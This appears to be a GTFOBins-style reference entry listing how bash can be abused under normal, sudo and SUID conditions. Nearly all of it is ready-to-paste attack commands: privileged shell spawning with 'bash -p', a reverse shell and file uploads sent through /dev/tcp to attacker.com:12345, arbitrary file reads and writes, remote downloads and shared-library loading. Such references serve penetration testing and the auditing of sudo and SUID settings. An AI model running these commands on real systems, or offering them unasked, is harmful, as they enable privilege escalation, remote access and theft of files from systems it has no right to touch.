This executable can spawn an interactive system shell.
This function can be performed by any unprivileged user.
bash
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p
This executable can send back a reverse system shell to a listening attacker.
This function can be performed by any unprivileged user.
bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'exec bash -i &>/dev/tcp/attacker.com/12345 <&1'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'exec bash -p -i &>/dev/tcp/attacker.com/12345 <&1'
This executable can write data to local files.
This function can be performed by any unprivileged user.
bash -c 'echo DATA >/path/to/output-file'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'echo DATA >/path/to/output-file'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'echo DATA >/path/to/output-file'
This function can be performed by any unprivileged user.
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
HISTIGNORE='history *'
history -c
DATA
history -w /path/to/output-file
This executable can read data from local files.
This function can be performed by any unprivileged user.
bash -c 'echo "$(</path/to/input-file)"'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'echo "$(</path/to/input-file)"'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'echo "$(</path/to/input-file)"'
This function can be performed by any unprivileged user.
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
HISTTIMEFORMAT=$'\r\e[K'
history -c
history -r /path/to/input-file
history
This executable can upload local data.
This function can be performed by any unprivileged user.
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'echo -e "POST / HTTP/0.9\n\n$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
This function can be performed by any unprivileged user.
bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'echo -n "$(</path/to/input-file)" >/dev/tcp/attacker.com/12345'
This executable can download remote data.
This function can be performed by any unprivileged user.
bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/attacker.com/12345 \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/attacker.com/12345 \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c '{ echo -ne "GET /path/to/input-file HTTP/1.0\r\nhost: attacker.com\r\n\r\n" 1>&3; cat 0<&3; } \
3<>/dev/tcp/attacker.com/12345 \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } >/path/to/output-file'
This function can be performed by any unprivileged user.
bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'echo "$(</dev/tcp/attacker.com/12345) >/path/to/output-file'
This executable can load shared libraries that may be used to run arbitrary code in the same execution context.
This function can be performed by any unprivileged user.
bash -c 'enable -f /path/to/lib.so x'
This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.
bash -c 'enable -f /path/to/lib.so x'
This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.
bash -p -c 'enable -f /path/to/lib.so x'